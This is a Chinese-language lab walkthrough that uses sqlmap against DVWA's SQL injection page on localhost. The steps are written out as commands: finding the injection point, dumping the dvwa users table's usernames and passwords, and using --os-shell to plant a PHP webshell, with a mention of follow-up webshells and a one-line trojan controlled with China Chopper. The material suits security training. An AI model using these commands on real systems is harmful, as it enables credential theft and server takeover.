DVWA SQL Injection之sqlmap使用

使用神器sqlmap进行DVWA的SQL Injection

需要注意的点:dvwa需要登录才能访问漏洞测试页面,所以使用sqlmap时需要提交登录后的cookie,cookie中有关于dvwa的security level设置属性,确保属性值是low

(1)检测是否存在sql注入漏洞

Sqlmap -u “http://127.0.0.1/DVWA-1.0.8/vulnerabilities/sqli/?Sub
mit=Submit&id=1″ –cookie=”security=low; PHPSESSID=6oo2m8nt02maprat8vc742add5”

sis_01

检测到数据库等信息,存在注入点,可以进一步注入

(2)爆数据库

Sqlmap -u “http://127.0.0.1/DVWA-1.0.8/vulnerabilities/sqli/?Sub
mit=Submit&id=1″ –cookie=”security=low; PHPSESSID=6oo2m8nt02maprat8vc742add5”

–dbs

sis_02

(3)选择dvwa数据库,爆数据表

Sqlmap -u “http://127.0.0.1/DVWA-1.0.8/vulnerabilities/sqli/?Sub
mit=Submit&id=1″ –cookie=”security=low; PHPSESSID=6oo2m8nt02maprat8vc742add5”

-D dvwa –tables

 

sis_03

(4)选择users数据表,爆字段

Sqlmap -u “http://127.0.0.1/DVWA-1.0.8/vulnerabilities/sqli/?Sub
mit=Submit&id=1″ –cookie=”security=low; PHPSESSID=6oo2m8nt02maprat8vc742add5”
-D dvwa -T users –columns
sis_04
(5)查看字段内容
Sqlmap -u “http://127.0.0.1/DVWA-1.0.8/vulnerabilities/sqli/?Sub
mit=Submit&id=1″ –cookie=”security=low; PHPSESSID=6oo2m8nt02maprat8vc742add5”
-D dvwa -T users -C “user,password” –dump
sis_05
(6)直接上传webshell
Sqlmap -u “http://127.0.0.1/DVWA-1.0.8/vulnerabilities/sqli/?Sub
mit=Submit&id=1″ –cookie=”security=low; PHPSESSID=6oo2m8nt02maprat8vc742add5”
–os-shell
会出现一个选择程序语言的界面,选择PHP
sis_06
然后会出现要求上传的文件的路径,输入路径
sis_07

系统自动建立一个叫做 tmpuqrrf.php的文件,上传完成后访问路径下的此文件

sis_08

是个小马,上传大马,上传成功后就可以访问。

在本次测试时,由于PHP版本是5.5,比较高,抛弃了allow_call_time_pass_reference 这个参数。由于本地的大马版本较低:(

在上传成功后访问出现问题,显示:

Fatal error: Call-time pass-by-reference has been removed in E:\xmapp\htdocs\DVWA-1.0.8\pass.php on line 1198

不过没关系,可以上传一句话木马,然后用菜刀链接就可。

 

 

 

您可能还喜欢...